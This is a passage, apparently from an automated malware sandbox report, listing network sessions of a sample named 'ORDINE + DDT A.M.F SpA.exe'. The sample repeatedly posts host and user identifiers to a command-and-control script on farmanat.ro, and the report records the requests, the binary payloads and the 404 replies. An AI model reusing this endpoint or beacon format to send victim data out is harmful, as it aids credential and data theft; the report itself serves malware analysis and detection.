                                              Date: Thu, 25 Nov 2021 09:54:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              785192.168.11.2050633176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:45.439632893 CET7398OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:45.473598003 CET7398OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:45.530987024 CET7398INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:44 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              786192.168.11.2050634176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:45.952049017 CET7399OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:45.986447096 CET7399OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:46.036932945 CET7400INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              787192.168.11.2050635176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:46.455302000 CET7400OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:46.488739967 CET7401OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:46.537779093 CET7401INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:45 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              788192.168.11.2050636176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:46.977530956 CET7402OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:47.012042046 CET7402OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:47.062096119 CET7402INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              789192.168.11.2050637176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:47.479979038 CET7403OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:47.514127016 CET7403OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:47.563481092 CET7404INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:46 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              79192.168.11.2049916176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:50.496916056 CET6425OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:50.530992031 CET6425OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:50.589412928 CET6425INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              790192.168.11.2050638176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:47.949234962 CET7404OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:47.982718945 CET7405OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:48.034163952 CET7405INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              791192.168.11.2050639176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:48.460000038 CET7406OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:48.494208097 CET7406OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:48.546823025 CET7406INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:47 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              792192.168.11.2050640176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:48.980263948 CET7407OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:49.013894081 CET7407OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:49.063332081 CET7408INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:48 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              793192.168.11.2050641176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:49.491342068 CET7408OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:49.525903940 CET7409OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:49.577491999 CET7409INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:48 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              794192.168.11.2050642176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:50.009141922 CET7410OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:50.042721033 CET7410OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:50.098364115 CET7410INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              795192.168.11.2050643176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:50.524008989 CET7411OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:50.557706118 CET7411OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:50.607568979 CET7412INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:49 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              796192.168.11.2050644176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:51.017242908 CET7412OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:51.051208973 CET7413OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:51.101434946 CET7413INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              797192.168.11.2050645176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:51.521089077 CET7414OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:51.554606915 CET7414OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:51.605211973 CET7414INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              798192.168.11.2050646176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:51.987313986 CET7415OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:52.021644115 CET7415OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:52.133135080 CET7416INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              799192.168.11.2050647176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:52.546072006 CET7416OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:54:52.580209017 CET7417OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:54:52.633761883 CET7417INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:54:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              8192.168.11.2049828176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:05.424331903 CET6316OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:05.457895994 CET6316OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:05.509834051 CET6317INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              80192.168.11.2049917176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:51.019889116 CET6426OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:51.053482056 CET6426OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:51.106699944 CET6427INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:50 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              800192.168.11.2050648176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:54:53.019557953 CET7418OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
